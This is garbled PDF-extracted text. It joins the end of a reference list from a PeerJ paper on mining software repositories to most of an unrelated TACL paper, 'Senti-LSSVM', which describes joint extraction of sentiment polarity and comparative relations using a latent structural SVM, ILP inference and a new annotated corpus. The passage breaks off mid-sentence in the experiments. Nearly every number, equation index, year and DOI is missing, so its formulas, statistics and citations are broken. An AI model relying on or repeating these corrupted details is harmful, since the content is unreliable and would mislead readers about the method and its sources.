http://dx.doi.org/ . /icsm. . http://dx.doi.org/ . /scam. . http://data-mining.philippe-fournier-viger.com/ http://dx.doi.org/ . /a http://dx.doi.org/ . /icsm. . http://dx.doi.org/ . /iwpse. . http://dx.doi.org/ . /ic: http://citeseerx.ist.psu.edu/viewdoc/download?doi= . . . . rep=rep type=pdf http://citeseerx.ist.psu.edu/viewdoc/download?doi= . . . . rep=rep type=pdf http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. hanlon b, larget b. . analysis of variance. available at http://www.stat.wisc.edu/ ~st - / -anova- .pdf (accessed on june ). hassan ae. . the road ahead for mining software repositories. in: frontiers of software maintenance, . fosm . washington, d.c.: ieee, – . hassan ae, holt rc. . predicting change propagation in software systems. in: proceedings of the ieee international conference on software maintenance. washington, d.c.: ieee, – doi . /icsm. . . hattori l, dos santos jr g, cardoso f, sampaio m. . mining software repositories for software change impact analysis: a case study. in: proceedings of the brazilian symposium on databases. porto alegre: sociedade brasileira de computação, – . hindle a, german dm, holt r. . what do large commits tell us?: a taxonomical study of large commits. in: proceedings of the international working conference on mining software repositories. new york: association for computing machinery, – doi . / . . hutton a, welland r. . an experiment measuring the effects of maintenance tasks on program knowledge. in: kitchenham b, brereton p, turner m, eds. proceedings of the international conference on evaluation and assessment in software engineering. london: british computer society, – . ieee. . ieee standard for software maintenance. ieee std - . washington, d.c.: ieee. iso/iec iso/iec : software engineering-software maintenance. . available at https://www.iso.org/standard/ .html (accessed on march ). iso/iec iso/iec : information technology-software life cycle processes. . available at https://www.iso.org/standard/ .html (accessed on march ). kagdi h. . improving change prediction with fine-grained source code mining. in: proceedings of the ieee/acm international conference on automated software engineering. washington, d.c.: ieee, – doi . / . . kagdi h, yusuf s, maletic ji. . mining sequences of changed-files from version histories. in: proceedings of the international workshop on mining software repositories. washington, d.c.: ieee, – doi . / . . lientz bp, swanson eb. . software maintenance management. boston: addison- wesley longman publishing co., inc. nachar n. . the mann–whitney u: a test for assessing whether two independent samples come from the same distribution. tutorials in quantitative methods for psychology : – doi . /tqmp. . .p . nguyen v, boehm b, danphitsanuphan p. . a controlled experiment in assessing and estimating software maintenance tasks. information and software technology : – doi . /j.infsof. . . . pigoski tm. . practical software maintenance: best practices for managing your software investment. st edition. hoboken: wiley publishing. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.stat.wisc.edu/~st - / -anova- .pdf http://www.stat.wisc.edu/~st - / -anova- .pdf http://dx.doi.org/ . /icsm. . http://dx.doi.org/ . / . https://www.iso.org/standard/ .html https://www.iso.org/standard/ .html http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /tqmp. . .p http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /peerj-cs. pohlert t. . the pairwise multiple comparison of mean ranks package. available at https://cran.r-project.org/web/packages/pmcmr/vignettes/pmcmr.pdf (accessed on march ). purushothaman r, perry de. . toward understanding the rhetoric of small source code changes. ieee transactions on software engineering ( ): – doi . /tse. . . ramadani j, wagner s. . are suggestions of coupled file changes interesting? in: maciaszek l, filipe j, eds. proceedings of the international conference on evaluation of novel software approaches to software engineering. setúbal: enase, – doi . / . revelle m, gethers m, poshyvanyk d. . using structural and textual information to capture feature coupling in object-oriented software. empirical software engineering : – doi . /s - - - . ricca f, leotta m, reggio g, tiso a, guerrini g, torchiano m. . using unimod for maintenance tasks: an experimental assessment in the context of model driven development. in: proceedings of the international workshop on modeling in software engineering. piscataway: ieee press, – doi . /mise. . . shelly gb, cashman tj, rosenblatt hj. . systems analysis and design. rd edition. cambridge: international thomson publishing. shirabad j, lethbridge t, matwin s. . mining the maintenance history of a legacy software system. in: proceedings of the international conference on software mainte- nance. washington, d.c.: ieee, – doi . /icsm. . . stafford ja. . software maintenance as part of the software life cycle. available at http://hepguru.com/maintenance/final_ _v .pdf (accessed on march ). stevens wp, myers gj, constantine ll. . structured design. ibm systems journal : – doi . /sj. . . swanson eb. . the dimensions of maintenance. in: proceedings of the international conference on software engineering. los alamitos: ieee, – . tomczak m, tomczak e. . the need to report effect size estimates revisited. an overview of some recommended measures of effect size. trends in sport sciences : – . van rysselberghe f, demeyer s. . mining version control systems for facs (frequently applied changes). in: hassan ae, holt rc, mockus a, eds. proceedings of the international workshop on mining repositories. – . van vliet h, van vliet h, van vliet j. . software engineering: principles and practice. new york: wiley. wu r, zhang h, kim s, cheung s-c. . relink: recovering links between bugs and changes. in: proceedings of the acm sigsoft symposium and the th european con- ference on foundations of software engineering. new york: association for computing machinery, – doi . / . . ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://cran.r-project.org/web/packages/pmcmr/vignettes/pmcmr.pdf http://dx.doi.org/ . /tse. . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /mise. . http://dx.doi.org/ . /icsm. . http://hepguru.com/maintenance/final_ _v .pdf http://dx.doi.org/ . /sj. . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. ying att, murphy gc, ng rt, chu-carroll m. . predicting source code changes by mining change history. ieee transactions on software engineering : – doi . /tse. . . zimmermann t, kim s, zeller a, whitehead jr ej. . mining version archives for co-changed lines. in: proceedings of the international workshop on mining software repositories. new york: association for computing machinery, – doi . / . . zimmermann t, weisgerber p, diehl s, zeller a. . mining version histories to guide software changes. in: proceedings of the international conference on soft- ware engineering. new york: association for computing machinery, – doi . / . . ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tse. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. senti-lssvm: sentiment-oriented multi-relation extraction with latent structural svm lizhen qu max planck institute for informatics lqu@mpi-inf.mpg.de yi zhang nuance communications yi.zhang@nuance.com rui wang dfki gmbh mars @hotmail.com lili jiang max planck institute for informatics ljiang@mpi-inf.mpg.de rainer gemulla max planck institute for informatics rgemulla@mpi-inf.mpg.de gerhard weikum max planck institute for informatics weikum@mpi-inf.mpg.de abstract extracting instances of sentiment-oriented re- lations from user-generated web documents is important for online marketing analysis. un- like previous work, we formulate this extrac- tion task as a structured prediction problem and design the corresponding inference as an integer linear program. our latent structural svm based model can learn from training cor- pora that do not contain explicit annotations of sentiment-bearing expressions, and it can si- multaneously recognize instances of both bi- nary (polarity) and ternary (comparative) re- lations with regard to entity mentions of in- terest. the empirical evaluation shows that our approach significantly outperforms state- of-the-art systems across domains (cameras and movies) and across genres (reviews and forum posts). the gold standard corpus that we built will also be a valuable resource for the community. introduction sentiment-oriented relation extraction (choi et al., ) is concerned with recognizing sentiment po- larities and comparative relations between entities from natural language text. identifying such rela- tions often requires syntactic and semantic analysis at both sentence and phrase level. most prior work on sentiment analysis consider either i) subjective sentence detection (yu and kübler, ), ii) po- larity classification (johansson and moschitti, ; wilson et al., ), or iii) comparative relation identification (jindal and liu, ; ganapathib- hotla and liu, ). in practice, however, differ- ent types of sentiment-oriented relations frequently coexist in documents. in particular, we found that more than % of the sentences in our test corpus contain more than one type of relations. the iso- lated analysis approach is inappropriate because i) it sacrifices acuracy by ignoring the intricate interplay among different types of relations; ii) it could lead to conflicting predictions such as estimating a relation candidate as both negative and comparative. there- fore, in this paper, we identify instances of both sen- timent polarities and comparative relations for enti- ties of interest simultaneously. we assume that all the mentions of entities and attributes are given, and entities are disambiguated. it is a widely used as- sumption when evaluating a module in a pipeline system that the outputs of preceding modules are error-free. to the best of our knowledge, the only exist- ing system capable of extracting both comparisons and sentiment polarities is a rule-based system pro- posed by ding et al. ( ). we argue that it is better to tackle the task by using a unified model with structured outputs. it allows us to consider a set of correlated relation instances jointly and char- acterize their interaction through a set of soft and hard constraints. for example, we can encode con- straints to discourage an attribute to participate in a polarity relation and a comparative relation at the same time. as a result, the system extracts a set of correlated instances of sentiment-oriented relations from a given sentence. for example, with the sen- tence about the camera canon d, “the sensor is great, but the price is higher than nikon d .” the expected output is positive(canon d, sensor) transactions of the association for computational linguistics, ( ) – . action editor: janyce wiebe. submitted / ; revised / ; published / . c© association for computational linguistics. and preferred(nikon d , canon d, textit- price). however, constructing a fully annotated train- ing corpus for this task is labor-intensive and re- quires strong linguistic background. we minimize this overhead by applying a simplified annotation scheme, in which annotators mark mentions of en- tities and attributes, disambiguate the entities, and label instances of relations for each sentence. based on the new scheme, we have created a small senti- ment relation graph (srg) corpus for the domains of cameras and movies, which significantly differs from the corpora used in prior work (wei and gulla, ; kessler et al., ; toprak et al., ; wiebe et al., ; hu and liu, ) in the follow- ing ways: i) both sentiment polarities and compar- ative relations are annotated; ii) all mentioned en- tities are disambiguated; and iii) no subjective ex- pressions are annotated, unless they are part of entity mentions. the new annotation scheme raises a new chal- lenge for learning algorithms in that they need to automatically find textual evidences for each anno- tated relation during training. for example, with the sentence “i like the rebel a little better, but that is another price jump”, simply assigning a sentiment- bearing expression to the nearest relation candidate is insufficient, especially when the sentiment is not explicitly expressed. in this paper, we propose senti-lssvm, a latent structural svm based model for sentiment-oriented relation extraction. senti-lssvm is applied to find the most likely set of the relation instances expressed in a given sentence, where the latent variables are used to assign the most appropriate textual evidences to the respective instances. in summary, the contributions of this paper are the following: • we propose senti-lssvm: the first unified sta- tistical model with the capability of extracting instances of both binary and ternary sentiment- oriented relations. • we design a task-specific integer linear pro- gramming (ilp) formulation for inference. • we construct a new srg corpus as a valuable asset for the evaluation of sentiment relation extraction. • we conduct extensive experiments with on- line reviews and forum posts, showing that senti-lssvm model can effectively learn from a training corpus without explicitly annotated subjective expressions and that its performance significantly outperforms state-of-the-art sys- tems. related work there are ample works on analyzing sentiment po- larities and entity comparisons, but the majority of them studied the two tasks in isolation. most prior approaches for fine-grained sentiment analysis focus on polarity classification. super- vised approaches on expression-level analysis re- quire the annotation of sentiment-bearing expres- sions as training data (jin et al., ; choi and cardie, ; johansson and moschitti, ; yessenalina and cardie, ; wei and gulla, ). however, the corresponding annotation pro- cess is time-consuming. although sentence-level annotations are easier to obtain, the analysis at this level cannot cope with sentences conveying relations of multiple types (mcdonald et al., ; täckström and mcdonald, ; socher et al., ). lexicon- based approaches require no training data (ku et al., ; kim and hovy, ; godbole et al., ; ding et al., ; popescu and etzioni, ; liu et al., ) but suffer from inferior performance (wil- son et al., ; qu et al., ). in contrast, our method requires no annotation of sentiment-bearing expressions for training and can predict both senti- ment polarities and comparative relations. sentiment-oriented comparative relations have been studied in the context of user-generated dis- course (jindal and liu, ; ganapathibhotla and liu, ). approaches rely on linguistically moti- vated rules and assume the existence of independent keywords in sentences which indicate comparative relations. therefore, these methods fall short of ex- tracting comparative relations based on domain de- pendent information. both johansson and moschitti ( ) and wu et al. ( ) formulate fine-grained sentiment analy- sis as a learning problem with structured outputs. however, they focus only on polarity classification of expressions and require annotation of sentiment- bearing expressions for training as well. while ilp has been previously applied for infer- ence in sentiment analysis (choi and cardie, ; somasundaran and wiebe, ; wu et al., ), our task requires a complete ilp reformulation due to ) the absence of annotated sentiment expressions and ) the constraints imposed by the joint extrac- tion of both sentiment polarity and comparative re- lations. system overview this section gives an overview of the whole system for extracting sentiment-oriented relation instances. prior to presenting the system architecture, we in- troduce the essential concepts and the definitions of two kinds of directed hypergraphs as the represen- tation of correlated relation instances extracted from sentences. . concepts and definitions entity. an entity is an abstract or concrete thing, which needs not be of material existence. an entity in this paper refers to either a product or a brand. attribute. an attribute is an object closely associ- ated with or belonging to an entity, such as the lens of digital camera. sentiment-oriented relation. a sentiment- oriented relation is either a sentiment polarity or a comparative relation, defined on tuples of entities and attributes. a sentiment polarity relation conveys either a positive or a negative attitude towards enti- ties or their attributes, whereas a comparative rela- tion indicates the preference of one entity over the other entity w.r.t. an attribute. relation instance. an instance of sentiment polar- ity takes the form r(entity, attribute) with r ∈ {pos- itive, negative}, such as positive(canon d, sen- sor). the polarity instances expressed in the form of unary relations, such as “nikon d is ex- cellent.”, are denoted as binary relations r(entity, whole), where the attribute whole indicates the en- tity as a whole. in contrast, an instance of compar- ative relation is in the form of preferred{entity, en- tity, attribute}, e.g. preferred(canon d, nikon d , price). for brevity, we refer to an instance set of sentiment-oriented relations extracted from a sentence as an ssor. to represent the instances of the remaining relations, we represent them as other{entity, attribute}, such as textitpartof{wheel, car}. these relations include objective relations and the subjective relations other than sentiment- oriented relations. mention-based relation instances. a mention- based relation instance refers to a tuple of entity mentions with a certain relation. this concept is in- troduced as the representation of instances in a sen- tence by replacing entities with the corresponding entity mentions, such as positive(“canon sd i”, “wide angle view”). figure : an example of mrg. mention-based relation graph. a mention-based relation graph (or mrg ) represents a collection of mention-based relation instances expressed in a sen- tence. as illustrated in figure , an mrg is a di- rected hypergraph g = 〈m,e〉 with a vertex set m and an edge set e. a vertex mi ∈ m denotes a mention of an entity or an attribute occurring ei- ther within the sentence or in its context. we say that a mention is from the context if it is mentioned in the previous sentence or is an attribute implied in the current sentence. an instance of a binary re- lation in an mrg takes the form of a binary edge el = (mi,ma), where mi and ma denote an en- tity mention and an attribute mention respectively, and the type l ∈ {positive, negative, other}. a ternary edge el indicating comparative relation is represented as el = (mi,mj,ma), where two en- tity mentions mi and mj are compared with respect to the attribute mention ma. we define the type l ∈ {better,worse} to indicate two possible direc- tions of the relation and assume mi occurs before mj. as a result, we have a set l of five relation types: positive, negative, better, worse or other. ac- cording to these definitions, the annotations in the srg corpus are actually mrgs and disambiguated entities. if there are multiple mentions referring to the same entity, annotators are asked to choose the most obvious one because it saves annotation time and is less demanding for the entity recognition and diambiguation modules. figure : an example of emrg. the textual evi- dences are wrapped by green dashed boxes. evidentiary mention-based relation graph. an evidentiary mention-based relation graph, coined emrg , extends an mrg by associating each edge with a textual evidence to support the corresponding relation assertions (see figure ). consequently, an edge in an emrg is denoted by a pair (a,c), where a represents a mention-based relation instance and c is the associated textual evidence. it is also re- ferred to as an evidentiary edge. represented as el = (mi,mj,ma), an mrg as an evidentiary mrg (emrg) and the edges of emrgs as evidentiary edges, as shown in figure . . system architecture figure : system architecture. as illustrated by figure , at the core of our sys- tem is the senti-lssvm model, which extracts sets of mention-based relationships in the form of emrgs from sentences. for a given sentence with known entity mentions, we select all possible mention sets as relation candidates, where each set includes at least one entity mention. then we associate each relation candidate with a set of constituents or the whole sentence as the textual evidence candidates (cf. section . ). subsequently, the inference com- ponent aims to find the most likely emrg from all possible combinations of mention-based relation in- stances and their textual evidences (cf. section . ). the representation emrg is chosen because it char- acterizes exactly the model outputs by letting each edge correspond to an instance of mention-based re- lation and the associated textual evidence. finally, the model parameters of this model are learned by an online algorithm (cf. section ). since instance sets of sentiment-oriented relations (ssors) are the expected outputs, we can obtain ssors from mrgs by using a simple rule-based al- gorithm. the algorithm essentially maps the men- tions from an mrg into entities and attributes in an ssor and label the corresponding tuples with the re- lation types of the edges from an mrg. for instances of comparative relation, the label better or worse is mapped to the relation type preferred. senti-lssvm model the task of sentiment-oriented relation extraction is to determine the most likely ssor in a sentence. since ssors are derived from the corresponding mrgs as described in section , the task is reduced to find the most likely mrg for each sentence. since an mrg is created by assigning relation types to a subset of all relation candidates, which are possible tuples of mentions with unknown relation types, the number of mrgs can be extremely high. to tackle the task, one solution is to employ an edge-factored linear model in the framework of structural svm (martins et al., ; tsochantaridis et al., ). the model suggests that a bag of fea- tures should be specified for each relation candidate, and then the model predicts the most likely candi- date sets along with their relation types to form the optimal mrgs. as we observed, for a relation can- didate, the most informative features are the words near its entity mentions in the original text. how- ever, if we represent a candidate by all these words, it is very likely that the instances of different relation types share overly similar features, because a men- tion is often involved in more than one relation can- didate, as shown in figure . as a consequence, the instances of different relations represented by overly similar features can easily confuse the learning algo- rithm. thus, it is critical to select proper constituents or sentences as textual evidences for each relation candidate in both training and testing. consequently, we divide the task of sentiment- oriented relation extraction into two subtasks : i) identifying the most likely mrgs; ii) assigning proper textual evidences to each edge of mrgs to support their relation assertions. it is desirable to carry out the two subtasks jointly as these two sub- tasks could enhance each other. first, the identifi- cation of relation types requires proper textual ev- idences; second, the soft and hard constraints im- posed by the correlated relation instances facilitate the recognition of the corresponding textual evi- dences. since the emrgs are created by attaching every mrg with a set of textual evidences, tackling the two subtasks simultaneously is equivalent to se- lecting the most likely emrg from a set of emrg candidates. it is challenging because our srg corpus does not contain any annotation of textual evidences. formally, let x denote the set of all available sen- tences, and we define y ∈ y(x)(x ∈ x) as the set of labeled edges of an mrg and y = ∪x∈xy(x). since the assignments of textual evidences are not observed, an assignment of evidences to y is de- noted by a latent variable h ∈ h(x) and h = ∪x∈xh(x). then (y,h) corresponds to an emrg, and (a,c) ∈ (y,h) is a labeled edge a attached with a textual evidence c. given a labeled dataset d = {(x ,y ), ..., (xn,yn)} ∈ (x ×y)n, we aim to learn a discriminant function f : x →y×h that outputs the optimal emrg (y,h) ∈y(x)×h(x) for a given sentence x. due to the introduction of latent variables, we adopt the latent structural svm (yu and joachims, ) for structural classification. our discriminant function is defined as f(x) = argmax(y,h)∈y(x)×h(x)β >Φ(x,y,h) ( ) where Φ(x,y,h) is the feature function of an emrg (y,h) and β is the corresponding weight vector. to ensure tractability, we also employ edge-based factorization for our model. let mp denote a set of entity mentions and yr(mi) be a set of edges labeled with sentiment-oriented relations incident to mi, the factorization of Φ(x,y,h) is given as Φ(x,y,h) = ∑ (a,c)∈(y,h) Φe(x,a,c) + ( ) ∑ mi∈mp ∑ a,a′∈yr(mi),a =a′ Φc(a,a ′) where Φe(x,a,c) is a local edge feature function for a labeled edge a attached with a textual evidence c and Φc(a,a′) is a feature function capturing co- occurrence of two labeled edges ami and a ′ mi inci- dent to an entity mention mi. feature space the following features are used in the feature func- tions (equation ): unigrams: as mentioned before, a textual evi- dence attached to an edge in mrg is either a word, phrase or sentence. we consider all lemmatized un- igrams in the textual evidence as unigram features. context: since web users usually express related sentiments about the same entity across sentence boundaries, we describe the sentiment flow using a set of contextual binary features. for example, if en- tity a is mentioned in both the previous sentence and the current sentence, a set of contextual binary fea- tures are used to indicate all possible combinations of the current and the previous mentioned sentiment- oriented relations regarding to entity a. co-occurrence: we have mentioned the co- occurrence feature in equation , indicated by Φc(a,a ′). it captures the co-occurrence of two la- beled edges incident to the same entity mention. note that the co-occurrence feature function is con- sidered only if there is a contrast conjunction such as “but” between the non-shared entity mentions inci- dent to the two labeled edges. senti-predictors: following the idea of (qu et al., ), we encode the prediction results from the rule-based phrase-level multi-relation predic- tor (ding et al., ) and from the bag-of-opinions predictor (qu et al., ) as features based on the textual evidence. the output of the first predictor is an integer value, while the output of the second predictor is a sentiment relation, such as “positive”, “negative”, “better” or “worse”. we map the rela- tional outputs into integer values and then encode the outputs from both predictors as senti-predictor features. others: the commonly used part-of-speech tags are also included as features. moreover, for an edge candidate, a set of binary features are used to denote the types of the edge and its entity mentions. for in- stance, a binary feature indicates whether an edge is a binary edge related to an entity mentioned in con- text. to characterize the syntactic dependencies be- tween two adjacent entity mentions, we use the path in the dependency tree between the heads of the cor- responding constituents, the number of words and other mentions in-between as features. additionally, if the textual evidence is a constituent, its feature w.r.t. an edge is the dependency path to the clos- est mention of the edge that does not overlap with this constituent. structural inference in order to find the best emrg for a given sentence with a well trained model, we need to determine the most likely relation type for each relation candi- date and support the corresponding assertions with proper textual evidences. we formulate this task as an integer linear programming (ilp). instead of considering all constituents of a sentence, we empir- ically select a subset as textual evidences for each relation candidate. . textual evidence candidates selection textual evidences are selected based on the con- stituent trees of sentences parsed by the stanford parser (klein and manning, ). for each men- tion in a sentence, we first locate a constituent in the tree with the maximal overlap by jaccard sim- ilarity. starting from this constituent, we consider two types of candidates: type i candidates are con- stituents at the highest level which contain neither any word of another mention nor any contrast con- junctions such as “but”; type ii candidates are con- stituents at the highest level which cover exactly two mentions of an edge and do not overlap with any other mentions. for a binary edge connecting an en- tity mention and an attribute mention, we consider a type i candidate starting from the attribute men- tion. for a binary edge connecting two entity men- tions, we consider type i candidates starting from both mentions. moreover, for a comparative ternary edge, we consider both type i and type ii candidates starting from the attribute mention. this strategy is based on our observation that these candidates of- ten cover the most important information w.r.t. the covered entity mentions. . ilp formulation we formulate the inference problem of finding the best emrg as an ilp problem due to its convenient integration of both soft and hard constraints. given the model parameters β, we reformulate the score of an emrg in the discriminant function ( ) as follows, β>Φ(x,y,h) = ∑ (a,c)∈(y,h) saczac + ∑ mi∈mp ∑ a,a′∈yr(mi),a =a′ saa′zaa′ where sac = β >Φe(x,a,c) denotes the score of a labeled edge a attached with a textual evidence c, saa′ = β >Φc(a,a ′) is the edge co-occurrence score, the binary variable zac indicates the presence or ab- sence of the corresponding edge, and zaa′ indicates if two edges co-occurr. as not every edge set can form an emrg, we require that a valid emrg should satisfy a set of linear constraints, which form our constraint space. then function ( ) is equivalent to max z∈b s>z + µzd s.t. a   z η τ   ≤ d z,η,τ ∈ b where b = s with s = { , }, and η and τ are auxiliary binary variables that help define the con- straint space. the above optimization problem takes exactly the form of an ilp because both the con- straints and the objective function are linear, and all variables take only integer values. in the following, we consider two types of con- straint space, ) an emrg with only binary edges and ) an emrg with both binary and ternary edges. emrg with only binary edges: an emrg has only binary edges if a sentence contains no attribute mention or at most one entity mention. we expect that each edge has only one relation type and is sup- ported by a single textual evidence. to facilitate the formulation of constraints, we introduce ηel to de- note the presence or absence of a labeled edge el, and ηec to indicate if a textual evidence c is assigned to an unlabeled edge e. then the binary variable for the corresponding evidentiary edge zelc = ηec ∧ηel , where the ilp formulation of conjunction can be found in (martins et al., ). let ce denote the set of textual evidence candi- dates of an unlabeled edge e. the constraint of at most one textual evidence per edge is formulated as: ∑ c∈ce ηec ≤ ( ) once a textual evidence is assigned to an edge, their relation labels should match and the number of labeled edges must agree with the number of at- tached textual evidences. further, we assume that a textual evidence c conveys at most one relation so that an evidence will not be assigned to the relations of different types, which is the main problem for the structural svm based model. let ηcl indicate that the textual evidence c is labeled by the relation type l. the corresponding constraints are expressed as, ∑ l∈le ηel = ∑ c∈ce ηec; zelc ≤ ηcl; ∑ l∈l ηcl ≤ where le denotes the set of all possible labels for an unlabeled edge e, and l is the set of all relation types of mrgs (cf. section ). in order to avoid a textual evidence being overly reused by multiple relation candidates, we first pe- nalize the assignment of a textual evidence c to a labeled edge a by associating the corresponding zac with a fixed negative cost −µ in the objective func- tion. then the selection of one textual evidence per edge a is encouraged by associating µ to zdc in the objective function, where zdc = ∨ e∈sc ηec and sc is the set of edges that the textual evidence c serves as a candidate. the disjunction zdc is expressed as: zdc ≥ ηe,e ∈ sc zdc ≤ ∑ e∈sc ηe (a) binary edge structure (b) ternary edge structure figure : alternative structures associated with an attribute mention. this soft constraint not only encourages one textual evidence per edge, but also keeps it eligible for mul- tiple assignments. for any two labeled edge a and a′ incident to the same entity mention, the edge-to-edge co- occurrence is described by zca,a′ = za ∧za′ . emrg with both binary and ternary edges: if there are more than one entity mentions and at least one attribute mention in a sentence, an emrg can potentially have both binary and ternary edges. in this case, we assume that each mention of attributes can participate either in binary relations or in ternary relations. the assumption holds in more than . % of the sentences in our srg corpus, thus we describe it as a set of hard constraints. geometrically, the as- sumption can be visualized as the selection between two alternative structures incident to the same at- tribute mention, as shown in figure . note that, in the binary edge structure, we include not only the edges incident to the attribute mention but also the edge between the two entity mentions. let sbmi be the set of all possible labeled edges in a binary edge structure of an attribute mention mi. variable τbmi = ∨ el∈sbmi ηel indicates whether the attribute mention is associated with a binary edge structure or not. in the same manner, we use τtmi = ∨ el∈stmi ηel to indicate the association of the an attribute mention mi with an ternary edge struc- ture from the set of all incident ternary edges stmi . the selection between two alternative structures is formulated as τbmi + τ t mi = . as this influences only the edges incident to an attribute mention, we keep all the constraints introduced in the previous section unchanged except for constraint ( ), which is modified as ∑ c∈ce ηec ≤ τbmi ; ∑ c∈ce ηec ≤ τtmi therefore, we can have either binary edges or ternary edges for an attribute mention. learning model parameters given a set of training sentences d = {(x ,y ), . . . , (xn,yn)}, the best weight vec- tor β of the discriminant function ( ) is found by solving the following optimization problem: min β n n∑ i= [ max (ŷ,ĥ)∈y(x)×h(x) (β>Φ(x,ŷ, ĥ)+δ(ĥ, ŷ,y)) − max h̄∈h(x) β>Φ(x,y, h̄)] + ρ|β|] ( ) where δ(ĥ, ŷ,y) is a loss function measuring the dis- crepancies between an emrg (y,h̄) with gold stan- dard edge labels y and an emrg (ŷ, ĥ) with inferred labeled edges ŷ and textual evidences ĥ. due to the sparse nature of the lexical features, we apply l regularizer to the weight vector β, and the degree of sparsity is controlled by the hyperparameter ρ. since the l norm in the above optimization problem is not differentiable at zero, we apply the online forward-backward splitting (fobos) algo- rithm (duchi and singer, ). it requires two steps for updating the weight vector β by using a single training sentence x on each iteration t. βt+ = βt −εt∆t βt+ = arg min β ‖β −βt‖ + εtρ|β| where ∆t is the subgradient computed without con- sidering the l norm and εt is the learning rate. for a labeled sentence x, ∆t = Φ(x,ŷ∗, ĥ∗) − Φ(x,y, h̄∗), where the feature functions of the corre- sponding emrgs are inferred by solving (ŷ∗, ĥ∗) = arg max (ĥ,ŷ)∈h(x)×y(x)[β >Φ(x,ŷ, ĥ) + δ(ĥ, ŷ,y)] and (y,h̄∗) = arg maxh̄∈h(x) β >Φ(x,y, h̄), as in- dicated in the optimization problem ( ). the former inference problem is similar to the one we considered in the previous section except the inclusion of the loss function. we incorporate the loss function into the ilp formulation by defin- ing the loss between an mrg (y,h) and a gold stan- dard mrg as the sum of per-edge costs. in our ex- periments, we consider a positive cost ϕ for each wrongly labeled edge a, so that if an edge a has a different label from the gold standard, we add ϕ to the coefficient sac of the corresponding variable zac in the objective function of the ilp formulation. in addition, since the non-positive weights of edge labels in the initial learning phrase often lead to emrgs with many unlabeled edges, which harms the learning performance, we fix it by adding a con- straint for the minimal number of labeled edges in an emrg, ∑ a∈a ∑ c∈ca ηac ≥ ζ ( ) where a is the set of all labeled edge candidates and ζ denotes the minimal number of labeled edges. empirically, the best way to determine ζ is to make it equal to the maximal number of labeled edges in an emrg with the restriction that a tex- tual evidence can be assigned to at most one edge. by considering all the edge candidates a and all the textual evidence candidates c as two vertex sets in a bipartite graph ĝ = 〈v = (a,c),e〉 (with edges in e indicating which textual evidence can be assigned to which edge), ζ corresponds to exactly the size of a maximum matching of the bipartite graph . to find the optimal emrg (y,h̄∗), for the gold la- bel k of each edge, we consider the following set of constraints for inference since the labels of the edges are known for the training data, ∑ c∈ce ηec ≤ ; ηec ≤ lck ∑ k′∈l lck′ ≤ ; ∑ e∈sc ηec ≤ we include also the soft constraints, which avoid a textual evidence being overly reused by multiple relations, and the constraints similar to ( ) to ensure a minimal number of labeled edges and a minimal number of sentiment-oriented relations. it is computed by the hopcroft-karp algorithm (hopcroft and karp, ) in our implementation. srg corpus for evaluation we constructed the srg corpus, which in total consists of manually annotated online reviews and forum posts in the digital camera and movie domains . for each domain, we maintain a set of attributes and a list of entity names. the annotation scheme for the sentiment repre- sentation asserts minimal linguistic knowledge from our annotators. by focusing on the meanings of the sentences, the annotators make decisions based on their language intuition, not restricted by specific syntactic structures. taking the example in figure , the annotators only need to mark the mentions of entities and attributes from both the sentences and the context, disambiguate them, and label (“canon d”, “nikon d ”, price) as worse and (“canon d”, “sensor”) as positive, whereas in prior work, people have annotated the sentiment-bearing expres- sions such as “great” and link them to the respective relation instances as well. this also enables them to annotate instances of both sentiment polarity and comparative relaton, which are conveyed by not only explicit sentiment-bearing expressions like “excel- lent performance”, but also factual expressions im- plying evaluations such as “the v has x optical zoom and the v has x.”. camera movie reviews forums reviews forums positive negative comparison table : distribution of relation instances in srg corpus. annotators participated in the annotation project. after a short training period, annotators worked on randomly assigned documents one at a time. for product reviews, the system lists all rel- evant information about the entity and the prede- fined attributes. for forum posts, the system shows only the attribute list. for each sentence in a doc- ument, the annotator first determines if it refers to an entity of interest. if not, the sentence is marked the camera reviews are from bestbuy.com and ama- zon.com; the camera forum posts are downloaded from fo- rum.digitalcamerareview.com; the movie reviews and forum posts are from imdb.com and boards.ie respectively as off-topic. otherwise, the annotator will identify the most obvious mentions, disambiguate them, and mark the mrgs. we evaluate the inter-annotator agreement on ssors in terms of cohen’s kappa (κ) (cohen, ). an average kappa value of . was achieved on a randomly selected set consisting of sentences. table shows the corpus distribution after nor- malizing them into ssors. camera forum posts con- tain the largest proportion of comparisons because they are mainly about the recommendation of dig- ital cameras. in contrast, web users are much less interested in comparing movies, in both reviews and forums. in all subsets, positive relations play a dom- inant role since web users intend to express more positive attitudes online than negative ones (pang and lee, ). experiments this section describes the empirical evaluation of senti-lssvm together with two competitive base- lines on the srg corpus. . experimental setup we implemented a rule-based baseline (ding- rule) and a structural svm (tsochantaridis et al., ) baseline (senti-ssvm) for comparison. the former system extends the work of ding et al. ( ), which designed several linguistically- motivated rules based on a sentiment polarity lexi- con for relation identification and assumes there is only one type of sentiment relation in a sentence. in our implementation, we keep all the rules of (ding et al., ) and add one phrase-level rule when there are more than one mention in a sentence. the ad- ditional rule assigns sentiment-bearing words and negators to its nearest relation candidates based on the absolute surface distance between the words and the corresponding mentions. in this case, the phrase- level sentiment-oriented relations depend only on the assigned sentiment words and negators. the lat- ter system is based on a structural svm and does not consider the assignment of textual evidences to relation instances during inference. the textual fea- tures of a relation candidate are all lexical and sen- timent predictor features within a surface distance of four words from the mentions of the candidate. thus, this baseline does not need the inference con- straints of senti-lssvm for the selection of textual evidences. to gain more insights into the model, we also evaluate the contribution of individual fea- tures of senti-lssvm. in addition, to show if identi- fying sentiment polarities and comparative relations jointly works better than tackling each task on its own, we train senti-lssvm for each task separately and combine their predictions according to compat- ibility rules and the corresponding graph scores. for each domain and text genre, we withheld % documents for development and use the remaining for cross validation. the hyperparameters of all sys- tems are tuned on the development datasets. for all experiments of senti-lssvm, we use ρ = . for the l regularizer in eq.( ) and ϕ = . for the loss function; and for senti-ssvm, ρ = . and ϕ = . . since the relation type of off-topic sentences is certainly other, we evaluate all systems with -fold 